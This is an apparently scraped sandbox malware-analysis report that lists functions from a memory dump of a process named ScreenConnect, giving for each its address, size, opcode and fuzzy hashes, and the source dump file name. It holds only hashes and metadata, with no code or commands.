Instruction ID: 390df61864b9b30f7f7d95ac04c1f970a14ed7476bd87484eb37ae91c562d682
Opcode Fuzzy Hash: d60f3c8e30a2959fd194407340b4c2188d5f46187e169c6ea08031a28fb7cd5a
Instruction Fuzzy Hash: 3A310831B18E4E8FDB91DB2C98541EA7BD1FF4A324F440176D40DD3292DE29E8118382

Function 00007FFD34A8CB8D Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af84f12b88d1164b20bd128c740415ed444e72a309b3ebb30a2345ebed41b871
Instruction ID: 10b95d223b90b56ac5469222964b3fc119beb46f9a8b11fe47daf4241cd10071
Opcode Fuzzy Hash: af84f12b88d1164b20bd128c740415ed444e72a309b3ebb30a2345ebed41b871
Instruction Fuzzy Hash: D9315062A1CE850FE7A8A62858691A97FD0EFA6714F04007FE54DC72D3DD1CBC054782

Function 00007FFD34A8B86D Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809671bbffdc880869c257f06ba91d4d5b6ca76709a66b31fffe1891e6bf3ce7
Instruction ID: ccd3ff0b4cc8d0cb16184b1322d70d2989abe10d570795770573ac648a4386e0
Opcode Fuzzy Hash: 809671bbffdc880869c257f06ba91d4d5b6ca76709a66b31fffe1891e6bf3ce7
Instruction Fuzzy Hash: B5313F71708A4D8FDFD4DF18C4A4AA937E1FF69318B2406A9E51ED7296CB35E842CB40

Function 00007FFD34A882D9 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af04ebc5a0efa3634a111e62f1aa359a38129a145b2516368524be0f8a731b7
Instruction ID: 2d44ac1a4c3f58cdfd6826cc6e8c5c9fbc00b2fdf20ceeb5220ea654c5458525
Opcode Fuzzy Hash: 6af04ebc5a0efa3634a111e62f1aa359a38129a145b2516368524be0f8a731b7
Instruction Fuzzy Hash: 7531E873F0DE894BEBD59A2818711E93F91EF56318F5810ABE65CD7292DE2DE8009341

Function 00007FFD34A842A9 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d515eb73b17210ba8af2efbee3d6ad172d4d0fc9f5e70e3042446cbb2e788d6
Instruction ID: 880fa7202bb2857dfe3338ae81dd05231e3cfe7ba8962e796225e9afbe07e57c
Opcode Fuzzy Hash: 3d515eb73b17210ba8af2efbee3d6ad172d4d0fc9f5e70e3042446cbb2e788d6
Instruction Fuzzy Hash: 3821E122B1DA4A0BE7E4E66C58A62B47BC5FF6A314F5500BAD54CC72C3ED5DAC818381

Function 00007FFD34A8CBCD Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744605ad8bab2eef3787c5bd28cc15775bdc0f729ef26fdd21647104f63eedbc
Instruction ID: 5ed714e65920193a3b3b0e7454f8d9f904588579279b44532878791201378ae4
Opcode Fuzzy Hash: 744605ad8bab2eef3787c5bd28cc15775bdc0f729ef26fdd21647104f63eedbc
Instruction Fuzzy Hash: ED212062B1DF850BE7A8961C4C696697BD0EFA5714F0401AFE54DC72D3ED28BC0587C2

Function 00007FFD34A87F8A Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6f092516b848201f247a34a616cbfd77d3547407afe9e21700bb9064fff7fb
Instruction ID: 2a5ea05fb9d8beb9ae880bce0020ed45d7c557bd54b6776a3b47a7b9c46b9cfc
Opcode Fuzzy Hash: 4c6f092516b848201f247a34a616cbfd77d3547407afe9e21700bb9064fff7fb
Instruction Fuzzy Hash: 3921E63160DE894FE7A69B259C641A57FE1FF86318B1801BBD189C7193DE2CA842C751

Function 00007FFD34A8C049 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1c9a92e33c9c60fde13415253627cf834726bad3685840f65a603fea336c00
Instruction ID: 524311d6ebb378fffd104ef41c99b9b6ad5127e83900936ab9249bf8cd865ada
Opcode Fuzzy Hash: 8b1c9a92e33c9c60fde13415253627cf834726bad3685840f65a603fea336c00
Instruction Fuzzy Hash: EA21AF32A08A8C4FE7D5CF28C8915A17FE1FF95354B2402BBD44DCB252DD2EE9468781

Function 00007FFD34A88E14 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2572b2a280ad21d02b981c2b522d0e4e28d98308030b1a0b61a3aadf559c8885
Instruction ID: bfcef67b7d434c1e0408067ec5c920095acaeaf4246737443242c61e72af260a
Opcode Fuzzy Hash: 2572b2a280ad21d02b981c2b522d0e4e28d98308030b1a0b61a3aadf559c8885
Instruction Fuzzy Hash: 9921A132B1DD494EEBD5DA1898F06B83E91EF9A308F25006DD54DD31D3CE29EC019741

Function 00007FFD34A89882 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fdd6813fd96cfee642e50f33bd8648c11cf19b54297ce58e4795882350a5012
Instruction ID: 0ac26c4d8971e0ee29e4f545dcd489e1d716a14b4072af933e22c473506de8a9
Opcode Fuzzy Hash: 8fdd6813fd96cfee642e50f33bd8648c11cf19b54297ce58e4795882350a5012
Instruction Fuzzy Hash: 17110A6260D7C90FE796CB3814B51657FE0EF87204F1905FFD089CB1A3C55D98069742

Function 00007FFD34A8D789 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8539ccffe1f660664c1f45e7afda0c87fbd4d9f41b6d95b3040cad6113ea3fe
Instruction ID: 986f1ebed247b39955e6104f07c925ac9b1391076d43a30b2a43e374cbce8843
Opcode Fuzzy Hash: c8539ccffe1f660664c1f45e7afda0c87fbd4d9f41b6d95b3040cad6113ea3fe
Instruction Fuzzy Hash: A6113893B1DD8A0BF7A8A52828625B93BC0EF51228B1441AFE19AC71C7EC0DB4074284

Function 00007FFD34A86BE0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d58d1f16af7fc988ead2dfde2469a2596c4b3b8a8cc13a8d65024a1ff77d48
Instruction ID: c5fc14ee2ac58f125cb833ee0f6216fdf5b301a981bffd0386931f652f3a5beb
Opcode Fuzzy Hash: 77d58d1f16af7fc988ead2dfde2469a2596c4b3b8a8cc13a8d65024a1ff77d48
Instruction Fuzzy Hash: AC119431718D084FE7D4EA28D4A8676B7D1FFA9319B24057ED84DC72A5DE2A9C40C741

Function 00007FFD34A84D1D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57964f81cdf00ae601821261032855fe81cbf82211fcba273ace7d9fe41e1a8f
Instruction ID: 357261964792fd14759682140b6c7994ed981ecb4d15158e5bbb14f6c52ecede
Opcode Fuzzy Hash: 57964f81cdf00ae601821261032855fe81cbf82211fcba273ace7d9fe41e1a8f
Instruction Fuzzy Hash: 0411A272E0DF889BEFD2DF5858A55A87FA0EF56308F15009AD158D3293EB28A400C742

Function 00007FFD34A8DFDD Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703af05b37e2ef3c56aa1b7a9fd84fdf0539b2f346363e41e8e0d2405bacf7d7
Instruction ID: d85636fa33793f532e19fe5e9ab1e45ec1a73e1f6a026c19499d7a430f61147c
Opcode Fuzzy Hash: 703af05b37e2ef3c56aa1b7a9fd84fdf0539b2f346363e41e8e0d2405bacf7d7
Instruction Fuzzy Hash: A7312B74B062068FE788EB64C8B17ED7AA1FB56314F20417EC24ED72C2DE3C19519B92

Function 00007FFD34A8ADBD Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50efc061069cdd40ed910d59ff43acc59720ea489af3798d6c9bc896729b973e
Instruction ID: a3469a9d35135ac616d664284cfd538ee5b043e879bd7e8c7a87ca0ea9d55b20
Opcode Fuzzy Hash: 50efc061069cdd40ed910d59ff43acc59720ea489af3798d6c9bc896729b973e
Instruction Fuzzy Hash: 03016672B1CB440BDB4C9A08A8521F87BD1EF85724B0004AFF18AD3286DD66A80286C1

Function 00007FFD34A898C0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f245e823b3a36bfd747bd25843dd1933bb60a85170770855f57d5a7d1892e32
Instruction ID: 04e99cd3e31ce12f38b403915184728ac0a9bd70c9ea67564adf78e65e8f5bbc
Opcode Fuzzy Hash: 9f245e823b3a36bfd747bd25843dd1933bb60a85170770855f57d5a7d1892e32
Instruction Fuzzy Hash: CE01927260E7C80FD796972808741657FE0EF47215F1905EFE0C9DB6A3C55D88059752

Function 00007FFD34A84219 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45513b7e9637401235a15ac6261ddd7a46c9884cd07e481f28967592ce862e75
Instruction ID: ad3aa77ec0c4154b0e2e4cf7c968b605d596200f4eddc712f06e444f14748d2a
Opcode Fuzzy Hash: 45513b7e9637401235a15ac6261ddd7a46c9884cd07e481f28967592ce862e75
Instruction Fuzzy Hash: A1110224F0DA870AFBA9932944F13746EE1EF86344F2981BAC549CA1D6FC1DAC81A301

Function 00007FFD34A8E99D Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2db0745186e61150f2ebed376c4ac70793b73ba9aaeb9232d5a4785651f9d5
Instruction ID: 206472568f0221c4cc5c89670143e85dcad62a8e9f683aa63c5007efe1e460d4
Opcode Fuzzy Hash: bd2db0745186e61150f2ebed376c4ac70793b73ba9aaeb9232d5a4785651f9d5
Instruction Fuzzy Hash: 5811A471A158199FDBE4EB58C899A98B7F1FF28300F4441E9E44DE7262DE38ED818F00

Function 00007FFD34A8CCA7 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd043d3840b9e1195d4d503d53a511e3a164e2010decce1ae435dd40ee9cfc2f
Instruction ID: 732989267abd1f4cb2e5f9bbfd65aec82e1e54b8abc172cf5dc972e35e66ba6a
Opcode Fuzzy Hash: fd043d3840b9e1195d4d503d53a511e3a164e2010decce1ae435dd40ee9cfc2f
Instruction Fuzzy Hash: C601AD3060CB028BD79DEB28E0915B9B7D1FF86314F60087CE149C26C6CE3AE446CB01

Function 00007FFD34A80AFB Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fcf9dd71509ba297f8af4328e21dee94c2dcccf576b03fca0a22f37bd929056
Instruction ID: 32f1fa2f5d3e27f7896145cf576b3e92ccf1c36a61bb8f16596819c5a87ac9d7
Opcode Fuzzy Hash: 9fcf9dd71509ba297f8af4328e21dee94c2dcccf576b03fca0a22f37bd929056
Instruction Fuzzy Hash: 45017D3660D7499FCB52EB2CE8B18D97BA0FF5332D70400BBC288CA012DA255849C781

Function 00007FFD34A859CC Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bbd0f6db2b64bc407acaa15dc06b8203d399b70ecb5b0c0b8cebcb13275f6d
Instruction ID: 3415ed43e933ffeb722c87fc6fc2a8e30c3b90aef8eb546f8a4fc6c6745ddc7c
Opcode Fuzzy Hash: 67bbd0f6db2b64bc407acaa15dc06b8203d399b70ecb5b0c0b8cebcb13275f6d
Instruction Fuzzy Hash: 2001FF70B1A5078AFEE9AF1540F46B96AC1EF57309FE40478DE4ECA1C7CD1CE809A650

Function 00007FFD34A82367 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728893fbe2e8e583aa12b0016edbd9de231179b3f5fb64fb833704f04b4b5287
Instruction ID: f50d6cfb6ff40da6ee13cf91653a81e0f975a1d14927efee026b175b1c826607
Opcode Fuzzy Hash: 728893fbe2e8e583aa12b0016edbd9de231179b3f5fb64fb833704f04b4b5287
Instruction Fuzzy Hash: 17010C71B199068FEBD8DE18C0A07B47B91FF55308F6441A8C54EDB287CE29F8469741

Function 00007FFD34A80685 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3b88fdc1ba567755a572a84efc0daad954d9c2163b39625c8265002130c6e1
Instruction ID: 6c894ec15fa7a894e097f9157337a2335ef121950d5724f8cfa08c02edf30b63
Opcode Fuzzy Hash: 1b3b88fdc1ba567755a572a84efc0daad954d9c2163b39625c8265002130c6e1
Instruction Fuzzy Hash: 0AF0A42140D3D20FD39297B088A5AD17FF0EF47110B0E42FAD484CB4A3D50C588A9362

Function 00007FFD34A823D0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41430ff3557c33e1d7e24b191a86f003830340a08169966e58e3c2048b36b411
Instruction ID: c3e609d000ec9ddd41fda19ebfa1f2a02b192fad40753cb38960d8f8cf4d1c1b
Opcode Fuzzy Hash: 41430ff3557c33e1d7e24b191a86f003830340a08169966e58e3c2048b36b411
Instruction Fuzzy Hash: 4F011A71B199068FEBD8DF18C0A0BB47BA1FF59308F5441A8C44EDB287CE39E8469741

Function 00007FFD34A8EC30 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d51579fa5075b328945caceb372acc2e73448e5051df614781c39e228c3a6f
Instruction ID: a7d92538463c0df9fc68c00b57123b1251a25bbf8a9488ae7b3313e4869c7002
Opcode Fuzzy Hash: f1d51579fa5075b328945caceb372acc2e73448e5051df614781c39e228c3a6f
Instruction Fuzzy Hash: BFE09BB114D50C6EA61CAA55AC479F7779CE747134F40111FE18EC5002F156B5238295

Function 00007FFD34A8CDB8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28fc557579da3aad66a1dbac78b91b39366584d038307ae3d9cdad4a5cd3f63
Instruction ID: b20a1a4853cf386440f1e87751899497f40d248e2d4f26e944078309d6b9d441
Opcode Fuzzy Hash: e28fc557579da3aad66a1dbac78b91b39366584d038307ae3d9cdad4a5cd3f63
Instruction Fuzzy Hash: FCF08232A54A4D8FD3156B7484651FD7BF9EF45105B6001BAE40DC3196DE2C9915C742

Function 00007FFD34A87CDD Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1af57a9a7a22e0c32d0ba618aa4ca5fe90ce139f7a4532c33c07cf4b4ef0998
Instruction ID: 0e0b1de25c0a29216688bb9669abb28df0707919ccb5d194733ab8843888f98d
Opcode Fuzzy Hash: c1af57a9a7a22e0c32d0ba618aa4ca5fe90ce139f7a4532c33c07cf4b4ef0998
Instruction Fuzzy Hash: 2BF0EC86F1D89B0BD6E5516C2CE51786AC1DFE561477804BBE11CC328BFC4C6C431281

Function 00007FFD34A83599 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb5e12764e7ede83500b0c5dd30802837fee7560d2d99139234d21df99add80f
Instruction ID: 4da211959e5e412d5f0aaa34caea2f5c467a0870c4276d1d4bc1a60e1792ffff
Opcode Fuzzy Hash: fb5e12764e7ede83500b0c5dd30802837fee7560d2d99139234d21df99add80f
Instruction Fuzzy Hash: 55F0653540C68C5FDF56EB64D4918D67FB0FE1B324B0501C7E149CB053D7659A59CB82

Function 00007FFD34A8EA92 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d5550363c97794779e9e0c27baaf7f9c5a051abf210e916a871c2ecec8e0c8
Instruction ID: a02fc33b8e1eec9db4825282fb0e303202d592f0ed962ea0df6043b15666a581
Opcode Fuzzy Hash: f2d5550363c97794779e9e0c27baaf7f9c5a051abf210e916a871c2ecec8e0c8
Instruction Fuzzy Hash: 8DF0FE31E0452E8EDBE4DB2898A97F9B7B1FF95305FA001B9C11DD3281CE396D819B40

Function 00007FFD34A80521 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c05428cab9c309db450bafd0ac65db065430d3db648e8e3fdd2b71095ed85b9
Instruction ID: b2096317eb7a889254ef4348825ba302e3a5b025314a22a919250942bf16091a
Opcode Fuzzy Hash: 0c05428cab9c309db450bafd0ac65db065430d3db648e8e3fdd2b71095ed85b9
Instruction Fuzzy Hash: 30E0D86110F3C51FDB67973488A98E53FA0ED1722030A00EFD581CF4B3E5198989D752

Function 00007FFD34A84230 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86429da157c8a03c16692351af24185f4ca2b53ccee7ea5a7f853bf47b7265e8
Instruction ID: 72b5e04099e8cc9f4f20362cd3761a420ca18d60084e02199c3b2ee6a999b9c7
Opcode Fuzzy Hash: 86429da157c8a03c16692351af24185f4ca2b53ccee7ea5a7f853bf47b7265e8
Instruction Fuzzy Hash: FBE0C225B4DA0742FFBCA27578F23B5A4D0CF86315F1980BA951DC44C9FC5C9CC1A292

Function 00007FFD34A8EAC4 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e988429d01bf1801649ed72ab25f4e209665fe51d7f3d426b50e1e523c44c93a
Instruction ID: 8cd809aba2d2ce9797d67ff6f77048bb977d2f88204de0984ae0df3692d0151a
Opcode Fuzzy Hash: e988429d01bf1801649ed72ab25f4e209665fe51d7f3d426b50e1e523c44c93a
Instruction Fuzzy Hash: 3DE0E531A1492D8EDBA8EB6898A92ECB3B1EB85315F5001F6C20CD2291CE3469818B40

Function 00007FFD34A8B50D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7608f1728c81b780ad7e4e1060e676701baa48c7ffc10bff3685514d3e6248c8
Instruction ID: c56a32d738ef71da7a1dd9e5c4e5b824f6d0bf9dbf115f41ec51ba9b96b8a540
Opcode Fuzzy Hash: 7608f1728c81b780ad7e4e1060e676701baa48c7ffc10bff3685514d3e6248c8
Instruction Fuzzy Hash: 8ED05E52B1D81A0AA6D4925C24E21B846C1E7896E476400B7E52EC728AEC0CAC8312C0

Function 00007FFD34A87D0F Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76901cbb2739ac76146a3324f6c2f591e5622cc61c2203a93b769ae80643bc1
Instruction ID: f0278c410490ffc621aec861f16afc768032d6eae2213ba0c68a3a0ae16440a5
Opcode Fuzzy Hash: e76901cbb2739ac76146a3324f6c2f591e5622cc61c2203a93b769ae80643bc1
Instruction Fuzzy Hash: 89D01243B59C1F0FA5D4915C38AAAF452C2D7E86657681477EE1CC334AED1CAC8327C1

Function 00007FFD34A89DC3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba9f37f8cacc12d43ae6da9d0dfd377f654e95c5ce606cc12183901310604e4
Instruction ID: c35ee9d9aa926391e9f2294e22e41bd8df3ccdaee937674fce71968df4c8ce9a
Opcode Fuzzy Hash: aba9f37f8cacc12d43ae6da9d0dfd377f654e95c5ce606cc12183901310604e4
Instruction Fuzzy Hash: F5D06C3571495D8F8B80EF4CE880AEA77A0FF99312B8108A1E61DC7225CA75E8258B80

Function 00007FFD34A8246F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d934b06c8ce9960935b647ed001407a413cebd12b6cb8f2689c92c773dd801
Instruction ID: ba38702d797d573ccb0d5b7611ffd86f2655ef76d6ea044e75b94fed701c8a04
Opcode Fuzzy Hash: 62d934b06c8ce9960935b647ed001407a413cebd12b6cb8f2689c92c773dd801
Instruction Fuzzy Hash: BCC09B50F1854786F294EB244CE117D36526F89645BD0C935D10DC1186CD7C75017585

Function 00007FFD34A821AA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

